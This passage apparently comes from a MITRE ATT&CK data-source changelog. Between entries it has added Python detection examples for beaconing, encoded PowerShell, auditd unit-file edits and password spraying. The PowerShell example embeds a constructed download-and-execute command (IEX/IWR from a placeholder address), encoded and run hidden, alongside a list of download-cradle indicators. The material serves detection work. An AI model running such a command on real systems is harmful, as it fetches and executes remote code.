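1700000900.000000\tCabce\t10.0.0.7\t50221\t93.184.216.34\t80\ttcp\thttp\t0.900\t700\t30000\tSF
"""


def parse_conn_log(text: str) -> list:
    """Parse Zeek's TSV conn.log using its own #fields header; other comment lines are skipped."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            if fields is None:
                raise ValueError("conn.log has no #fields header")
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def detect_beacons(rows: list, min_connections: int = 5, max_cv: float = 0.1) -> list:
    """Group connections by (orig_h, resp_h, resp_p) and flag groups whose intervals
    between successive connections are nearly constant (low coefficient of variation)."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])].append(float(r["ts"]))
    flagged = []
    for (orig_h, resp_h, resp_p), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        intervals = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(intervals)
        cv = statistics.pstdev(intervals) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            flagged.append({"orig_h": orig_h, "resp_h": resp_h, "resp_p": resp_p,
                            "count": len(times), "mean_interval": round(mean, 2), "cv": round(cv, 4)})
    return flagged


if __name__ == "__main__":
    for beacon in detect_beacons(parse_conn_log(SAMPLE_CONN_LOG)):
        print(beacon)
```

Implants that add random jitter raise the CV; widening `max_cv` catches them at the cost of more false positives from polling software such as update checkers, so the rule is usually paired with an allowlist of known destinations. The same grouping works unchanged on Sysmon Event ID 3 or VPC flow records once they are mapped onto the same three fields and a timestamp.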
Process: OS API Execution
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description:
Operating system function/method calls executed by a process

New description:
Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
  - Leverage tools to monitor API execution behaviors at the process level.
  - Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
  - Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
  - Use Event IDs from Windows logs for specific API-related activities:
    - Event ID 4688: A new process has been created (can indirectly infer API use).
    - Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
  - Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
  - On Linux/macOS systems, leverage audit frameworks (e.g., `auditd`, `strace`) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
  - Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
  - Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21T15:41:36.287Z | 2025-04-18T15:10:31.145Z |
description | Operating system function/method calls executed by a process | Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Leverage tools to monitor API execution behaviors at the process level.
- Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
- Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
- Use Event IDs from Windows logs for specific API-related activities:
- Event ID 4688: A new process has been created (can indirectly infer API use).
- Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
  - Sandboxes such as Cuckoo Sandbox or Hybrid Analysis, or an analyst VM such as Flare VM running an API monitor, record API execution during malware detonation.
- Host-Based Logs:
  - On Linux/macOS, use the kernel audit framework (`auditd`) for always-on syscall logging and a tracer such as `strace` during analysis, to capture the system calls that library APIs map to.
- Runtime Monitors:
- Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
- Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environment variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
  - Event ID 1 (Process Creation): Records the image path, command line, file hashes, user, and the parent process with its command line, most of which Event ID 4688 lacks unless command-line auditing is enabled.
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
  - eBPF: Tracepoints or kprobes on `execve`/`execveat` (e.g., the `sched:sched_process_exec` tracepoint) give low-overhead process-creation telemetry; XDP is a packet-processing hook and does not observe system calls.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
  - Zeek (Bro) Logs: Do not see process creation themselves, but record the network sessions (SSH, SMB/RPC, WinRM) through which remote shells launch processes, so they supply the remote-origin context for a host's 4688 or `execve` event.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
  - Event ID 4689 (Process Termination) – Logged when a process exits; carries the process ID, process name, exit status and the subject account, but not the parent process, which must be joined from the matching Event ID 4688.
  - Event ID 7036 (Service Control Manager, System log) – Records a service entering the running or stopped state, which is how the shutdown of a security service surfaces.
- Sysmon (Windows):
  - Event ID 5 (Process Termination) – Records ProcessGuid, ProcessId, Image and User when a process exits; the parent-child relationship comes from correlating the ProcessGuid with the earlier Event ID 1.
- Linux/macOS Monitoring:
  - AuditD (`exit_group` and `kill` syscalls) – `exit_group` marks the process's own exit; auditing `kill` attributes a termination to the process and login UID that sent the signal.
  - eBPF: The `sched:sched_process_exit` tracepoint (or a kprobe on `do_exit`) records every process exit with PID and comm at low overhead; XDP is a packet hook and does not observe process events.
  - OSQuery: The `processes` table lists only live processes, so a termination shows up as a row that disappears between scheduled snapshots (differential results); it does not log exits directly.
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:43.635Z |
description | Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) | The establishment of a task or job that will execute at a predefined time or based on specific triggers.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 4698 (Scheduled Task Created) – Detects the creation of new scheduled tasks.
- Event ID 4702 (Scheduled Task Updated) – Identifies modifications to existing scheduled jobs.
  - Event ID 106 (Microsoft-Windows-TaskScheduler/Operational) – Task registered; Event IDs 200 and 201 in the same log record a task action starting and completing, and Event ID 140 records a task update.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Detects the execution of suspicious tasks started by `schtasks.exe`, `at.exe`, or `taskeng.exe`.
- Linux/macOS Monitoring:
- AuditD: Monitor modifications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` files.
  - Syslog: Capture cron job execution logs from `/var/log/cron` (`/var/log/syslog` on Debian-derived systems, or `journalctl -u cron`).
- OSQuery: Query the `crontab` and `launchd` tables for scheduled job configurations.
- Endpoint Detection and Response (EDR) Tools:
- Track scheduled task creation and modification events.
- SIEM & XDR Detection Rules:
- Monitor for scheduled jobs created by unusual users.
- Detect tasks executing scripts from non-standard directories. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Script: Script Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:16:55.269Z | 2025-04-18T15:12:46.164Z |
description | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | The execution of a text file that contains code via the interpreter.
*Data Collection Measures:*
- Windows Event Logs:
  - Event ID 4104 (PowerShell Script Block Logging, Microsoft-Windows-PowerShell/Operational) – Records the content of each script block as it is compiled, after PowerShell has decoded `-EncodedCommand` payloads, and logs the inner blocks that obfuscated code goes on to invoke, which is why it catches what the command line hides.
  - Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (`powershell.exe`, `wscript.exe`, `cscript.exe`); the script path is only visible with command-line auditing enabled.
  - Event ID 5861 (Microsoft-Windows-WMI-Activity/Operational) – Records the registration of a permanent WMI event consumer; an `ActiveScriptEventConsumer` binding runs VBScript or JScript on a trigger, so this is a script-execution source for WMI persistence, not an AMSI log.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
- Event ID 11 (File Creation) – Detects new script files written to disk before execution.
- Endpoint Detection and Response (EDR) Tools:
- Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
- PowerShell Logging:
- Enable Module Logging: Logs all loaded modules and cmdlets.
- Enable Script Block Logging: Captures complete PowerShell script execution history.
- SIEM Detection Rules:
- Detect script execution with obfuscated, encoded, or remote URLs.
- Alert on script executions using `-EncodedCommand` or `iex(iwr)`. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
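Worked example (added here; it is not ATT&CK content or part of this changelog): the last two bullets above say to alert on `-EncodedCommand` and `iex(iwr)`, but an encoded command hides the `iex`/`iwr` from a plain command-line match. The Python below, run over constructed 4688/Sysmon 1 style records, recognises every prefix of `-EncodedCommand` that `powershell.exe` accepts (`-e`, `-en`, `-enc`, ...), decodes the base64 UTF-16LE payload, and only then scans for download-and-execute indicators. The field names (`image`, `command_line`) and the sample records are assumptions made for the example.

```python
"""Decode PowerShell -EncodedCommand payloads found in process-creation telemetry."""
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# and the -ec alias, so a match on the literal "-EncodedCommand" alone misses most abuse.
_ENCODED_SWITCHES = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}

# Indicators worth alerting on once the script text is readable.
_SUSPICIOUS = re.compile(
    r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
    r"downloadfile|frombase64string|net\.webclient|start-bitstransfer)\b"
)

# Constructed sample records (not real telemetry), shaped like the fields a SIEM keeps
# from Windows Event ID 4688 / Sysmon Event ID 1.
_PAYLOAD = "IEX (IWR 'http://192.0.2.10/a.ps1' -UseBasicParsing)"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -enc "
                     + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the base64 argument that follows an -EncodedCommand style switch, if any."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in ("-", "/") and tok[1:].lower() in _ENCODED_SWITCHES:
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE text; return None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Classify one process-creation record carrying 'image' and 'command_line'."""
    command_line = event["command_line"]
    blob = extract_encoded_command(command_line)
    decoded = decode_encoded_command(blob) if blob else None
    # Scan the decoded script when there is one, otherwise the raw command line.
    text = decoded if decoded is not None else command_line
    indicators = sorted({m.lower() for m in _SUSPICIOUS.findall(text)})
    return {
        "image": event["image"],
        "encoded": blob is not None,
        "decoded": decoded,
        "indicators": indicators,
        # A payload that does not decode is still worth a look: it is either obfuscation
        # beyond plain base64 or a collection gap in the command line.
        "alert": bool(indicators) or (blob is not None and decoded is None),
    }


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev))
```

Event ID 4104 shows the same script block after PowerShell itself decodes it, so where both sources are collected the decoded text here and the 4104 ScriptBlockText should agree; a mismatch points at a tampered or truncated command line.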
Service: Service Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:54.408Z |
description | Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) | The registration of a new service or daemon on an operating system.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4697 (Security log) - A service was installed in the system; requires the Audit Security System Extension subcategory and records the service name, file name, type, start type and account.
  - Event ID 7045 (System log) - The Service Control Manager reports a new service installed; emitted for installs by administrators and adversaries alike and needs no audit policy.
  - Event ID 7034 (System log) - A service terminated unexpectedly; a crash of a security service can indicate tampering rather than creation.
- Sysmon Logs
  - Sysmon Event ID 1 - Process Creation (captures the service executable starting under `services.exe`, and tools such as `sc.exe create`).
  - Sysmon Event ID 4 - Sysmon service state changed; this reports only Sysmon's own start and stop, so it detects attempts to disable the sensor, not installation of other services.
  - Sysmon Event ID 13 - Registry value set under `HKLM\SYSTEM\CurrentControlSet\Services\<name>` (`ImagePath`, `Start`, `Type`), which is where service persistence lands.
- PowerShell Logging
- Monitor `New-Service` and `Set-Service` PowerShell cmdlets in Event ID 4104 (Script Block Logging).
- Linux/macOS Collection Methods
- AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`)
- AuditD Rules:
      - `auditctl -w /etc/systemd/system -p wa -k service_creation` (add `/usr/lib/systemd/system` and per-user `~/.config/systemd/user` directories to cover vendor and user units)
      - Detects changes to `systemd` service configurations.
    - Systemd Journals (`journalctl -u <service_name>`)
      - Shows the log lines of a named unit once it runs; a unit that starts logging without a matching package install or change ticket is suspect.
- LaunchDaemons & LaunchAgents (macOS)
- Monitor `/Library/LaunchDaemons/` and `/Library/LaunchAgents/` for new plist files. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:57.700Z |
description | Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) | Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 7040 - Detects modifications to the startup behavior of a service.
  - Event ID 7045 - Fires when a service is installed, including an adversary re-registering an existing service name with a different binary path.
- Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering.
- Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters.
- Sysmon Logs
- Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\`).
- Sysmon Event ID 1 - Can track execution of `sc.exe` or `PowerShell Set-Service`.
- PowerShell Logging
- Event ID 4104 (Script Block Logging) - Captures execution of commands like `Set-Service`, `New-Service`, or `sc config`.
  - Command-Line Logging (Event ID 4688 with command-line auditing enabled) - Tracks usage of service modification commands:
    - `sc config <service_name> start= auto`
    - `sc qc <service_name>`
- Linux/macOS Collection Methods
  - Systemd Journals (`journalctl -u <service_name>`) Shows the unit's own log lines, including restarts after a changed unit file is reloaded.
  - Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`) Captures changes to service state and execution parameters.
  - AuditD Rules for Service Modification
    - Monitor modifications to `/etc/systemd/system/` for new or altered service unit files: `auditctl -w /etc/systemd/system/ -p wa -k service_modification`
    - Track execution of `systemctl` or `service` with a watch on the binary, `auditctl -w /usr/bin/systemctl -p x -k service_mod`, which logs each execution with the login UID; filtering `execve` with `-F a0=systemctl` does not work, because `a0` is the pointer to the filename, not the string.
  - OSQuery for Linux/macOS Monitoring
    - Query the `systemd_units` table (not `processes` or `system_info`) for unit state and the unit file path, and diff results between runs: `SELECT id, active_state, sub_state, fragment_path FROM systemd_units WHERE active_state != 'active';`
- macOS Launch Daemon/Agent Modification
- Monitor for changes in:
- `/Library/LaunchDaemons/`
- `/Library/LaunchAgents/`
- Track modifications to `.plist` files indicating persistence attempts. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
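Worked example (added here; not part of the ATT&CK data): the `auditctl -w /etc/systemd/system/ -p wa -k service_modification` rule above produces several records per event (SYSCALL, CWD, PATH, PROCTITLE) that share one `msg=audit(timestamp:serial)` identifier, and `ausearch -k` is not always available where the logs end up. The Python below regroups constructed `audit.log` lines by serial, decodes the hex-encoded PROCTITLE, names the unit file touched, and flags events where the login UID (`auid`) differs from the effective UID, i.e. an interactive user who became root before editing the unit. The log lines are constructed for the example.

```python
"""Regroup auditd records for a systemd unit-file watch and name who changed what."""
import re
from collections import defaultdict

# Constructed audit.log lines, not a real capture, in the format auditd writes when
# `auditctl -w /etc/systemd/system/ -p wa -k service_modification` fires. The first event is
# an interactive user (auid=1000) who became root and edited a unit; the second is an
# unprivileged user whose attempt to create a unit failed with EACCES (exit=-13).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1713450000.123:4821): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffd2c1e4a10 a2=241 a3=1a4 items=2 ppid=2107 pid=2210 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="vim" exe="/usr/bin/vim" key="service_modification"
type=CWD msg=audit(1713450000.123:4821): cwd="/root"
type=PATH msg=audit(1713450000.123:4821): item=0 name="/etc/systemd/system/" inode=393217 dev=fd:00 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1713450000.123:4821): item=1 name="/etc/systemd/system/backup.service" inode=394011 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=PROCTITLE msg=audit(1713450000.123:4821): proctitle=76696D002F6574632F73797374656D642F73797374656D2F6261636B75702E73657276696365
type=SYSCALL msg=audit(1713450100.555:4830): arch=c000003e syscall=257 success=no exit=-13 a0=ffffff9c a1=55d1c0a2e3c0 a2=241 a3=1b6 items=2 ppid=3001 pid=3002 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=5 comm="bash" exe="/usr/bin/bash" key="service_modification"
type=PATH msg=audit(1713450100.555:4830): item=0 name="/etc/systemd/system/" inode=393217 dev=fd:00 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1713450100.555:4830): item=1 name="/etc/systemd/system/evil.service" nametype=CREATE
type=PROCTITLE msg=audit(1713450100.555:4830): proctitle="bash"
"""

_HEADER = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): ?(.*)$")
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def decode_proctitle(raw: str) -> str:
    """auditd hex-encodes proctitle when it holds NUL argument separators; else it is quoted."""
    if raw.startswith('"'):
        return raw.strip('"')
    return bytes.fromhex(raw).decode("utf-8", "replace").replace("\x00", " ")


def parse_audit_log(text: str) -> list:
    """Group records sharing one msg=audit(ts:serial) id into a single event dict."""
    events = defaultdict(lambda: {"paths": []})
    for line in text.splitlines():
        m = _HEADER.match(line)
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        raw = dict(_FIELD.findall(body))
        fields = {k: v.strip('"') for k, v in raw.items()}
        ev = events[int(serial)]
        ev["serial"], ev["time"] = int(serial), float(ts)
        if rtype == "SYSCALL":
            ev.update({k: fields.get(k) for k in
                       ("syscall", "success", "auid", "uid", "comm", "exe", "key")})
        elif rtype == "PATH":
            ev["paths"].append((fields.get("nametype"), fields.get("name")))
        elif rtype == "PROCTITLE":
            ev["proctitle"] = decode_proctitle(raw["proctitle"])
    return [events[s] for s in sorted(events)]


def service_modifications(text: str) -> list:
    """One finding per watched-directory event: who, with what command, touched which unit."""
    findings = []
    for ev in parse_audit_log(text):
        if ev.get("key") != "service_modification":
            continue
        files = [p for kind, p in ev["paths"] if kind != "PARENT" and p]
        findings.append({
            "serial": ev["serial"],
            "login_uid": ev["auid"],
            "effective_uid": ev["uid"],
            # auid is the UID at login and survives su/sudo; 4294967295 means no login session.
            "escalated": ev["auid"] not in ("4294967295", ev["uid"]),
            "succeeded": ev["success"] == "yes",
            "exe": ev["exe"],
            "command": ev.get("proctitle"),
            "files": files,
        })
    return findings


if __name__ == "__main__":
    for finding in service_modifications(SAMPLE_AUDIT_LOG):
        print(finding)
```

The failed attempt is kept on purpose: a `-p wa` watch fires on the syscall regardless of outcome, and an unprivileged user probing `/etc/systemd/system/` is itself a finding, while `success=no` keeps it out of a "unit file changed" ticket.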
User Account: User Account Authentication
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-07T16:19:46.282Z | 2025-04-18T15:09:42.067Z |
description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) | An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.
*Data Collection Measures:*
- Host-Based Authentication Logs
- Windows Event Logs
- Event ID 4776 – NTLM authentication attempt.
- Event ID 4624 – Successful user logon.
- Event ID 4625 – Failed authentication attempt.
- Event ID 4648 – Explicit logon with alternate credentials.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs SSH, sudo, and other authentication attempts.
- AuditD – Tracks authentication events via PAM modules.
- macOS Unified Logs – `/var/db/diagnostics` captures authentication failures.
- Cloud Authentication Logs
  - Microsoft Entra ID (formerly Azure AD) Logs
- Sign-in Logs – Tracks authentication attempts, MFA challenges, and conditional access failures.
- Audit Logs – Captures authentication-related configuration changes.
- Microsoft Graph API – Provides real-time sign-in analytics.
- Google Workspace & Office 365
- Google Admin Console – `User Login Report` tracks login attempts and failures.
- Office 365 Unified Audit Logs – Captures logins across Exchange, SharePoint, and Teams.
  - AWS CloudTrail & IAM
    - CloudTrail records console sign-ins as `ConsoleLogin` events (event source `signin.amazonaws.com`) and STS credential issuance such as `sts:GetSessionToken` and `sts:AssumeRole`.
    - A `ConsoleLogin` event whose `responseElements.ConsoleLogin` is `Failure` captures a failed console authentication; failed API calls carry an `errorCode` such as `AccessDenied` or `InvalidClientTokenId`.
- Container Authentication Monitoring
- Kubernetes Authentication Logs
    - Kubernetes API server audit logs (enabled with an audit policy on the API server) – Capture every request with the authenticated user or service account, verb and resource; `kubectl` itself writes no audit log.
- Azure Kubernetes Service (AKS) and Google Kubernetes Engine (GKE) – Logs IAM authentication events. |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
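Worked example (added here; not part of the ATT&CK data): the Windows events listed above become useful once they are evaluated together rather than one at a time. The Python below runs two detections over constructed 4625/4624 records: a password spray (one source IP failing against many distinct accounts inside a short window, with non-existent accounts counted separately) and a network logon that succeeds from a source that had just produced repeated failures. Field names, the sample records and the thresholds are assumptions made for the example.

```python
"""Spray and success-after-failure detection over Windows 4625/4624 logon records."""
from collections import defaultdict
from datetime import datetime, timedelta

_BASE = datetime(2025, 4, 18, 9, 0, 0)


def _logon(offset_s, event_id, user, ip, sub_status=None):
    """Build one constructed record shaped like the fields a SIEM keeps from 4624/4625."""
    return {"time": _BASE + timedelta(seconds=offset_s), "event_id": event_id,
            "target_user": user, "source_ip": ip, "logon_type": 3,
            # 4625 SubStatus: 0xC000006A = wrong password, 0xC0000064 = no such user
            "sub_status": sub_status}


# Constructed sample, not real telemetry: one spraying source and one user with a typo.
SAMPLE_LOGONS = [
    _logon(0, 4625, "adam", "203.0.113.5", "0xC000006A"),
    _logon(30, 4625, "bella", "203.0.113.5", "0xC000006A"),
    _logon(60, 4625, "svc-old", "203.0.113.5", "0xC0000064"),
    _logon(90, 4625, "chen", "203.0.113.5", "0xC000006A"),
    _logon(120, 4625, "dana", "203.0.113.5", "0xC000006A"),
    _logon(150, 4625, "eli", "203.0.113.5", "0xC000006A"),
    _logon(200, 4624, "eli", "203.0.113.5"),
    _logon(10, 4625, "alice", "10.0.0.7", "0xC000006A"),
    _logon(20, 4625, "alice", "10.0.0.7", "0xC000006A"),
    _logon(40, 4624, "alice", "10.0.0.7"),
]


def detect_logon_abuse(events, window=timedelta(minutes=5), min_users=5, min_failures=3):
    """Return spray and success-after-failure alerts from a list of logon records."""
    events = sorted(events, key=lambda e: e["time"])
    failures = defaultdict(list)          # source_ip -> [(time, user, sub_status)]
    sprayed = set()                       # sources already reported for spraying
    alerts = []
    for ev in events:
        ip = ev["source_ip"]
        # Keep only the failures inside the sliding window for this source.
        recent = [f for f in failures[ip] if ev["time"] - f[0] <= window]
        failures[ip] = recent
        if ev["event_id"] == 4625:
            recent.append((ev["time"], ev["target_user"].lower(), ev.get("sub_status")))
            users = {u for _, u, _ in recent}
            if len(users) >= min_users and ip not in sprayed:
                sprayed.add(ip)
                alerts.append({
                    "type": "password_spray", "source_ip": ip, "time": ev["time"],
                    "users": sorted(users),
                    # Non-existent accounts are a strong spray signal: real users rarely
                    # mistype their own account name across several attempts.
                    "unknown_users": sorted({u for _, u, s in recent if s == "0xC0000064"}),
                })
        elif ev["event_id"] == 4624 and ev["logon_type"] == 3 and len(recent) >= min_failures:
            alerts.append({
                "type": "success_after_failures", "source_ip": ip, "time": ev["time"],
                "user": ev["target_user"], "failures": len(recent),
                "users_tried": sorted({u for _, u, _ in recent}),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_logon_abuse(SAMPLE_LOGONS):
        print(alert)
```

The same logic applies to 4776 on a domain controller (NTLM validation, where the failing source shows up as the workstation name) and to `/var/log/auth.log` `Failed password` lines once they are normalised to the same fields; 4625 is used here because it carries both the source address and the SubStatus that separates unknown accounts from wrong passwords.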
Windows Registry: Windows Registry Key Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:03.268Z |
description | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) | The removal of a registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
  - Event ID 4658 - The handle to an object was closed: Generic; it follows every audited handle, so on its own it says nothing about deletion and is useful only to correlate with 4660 on the Handle ID.
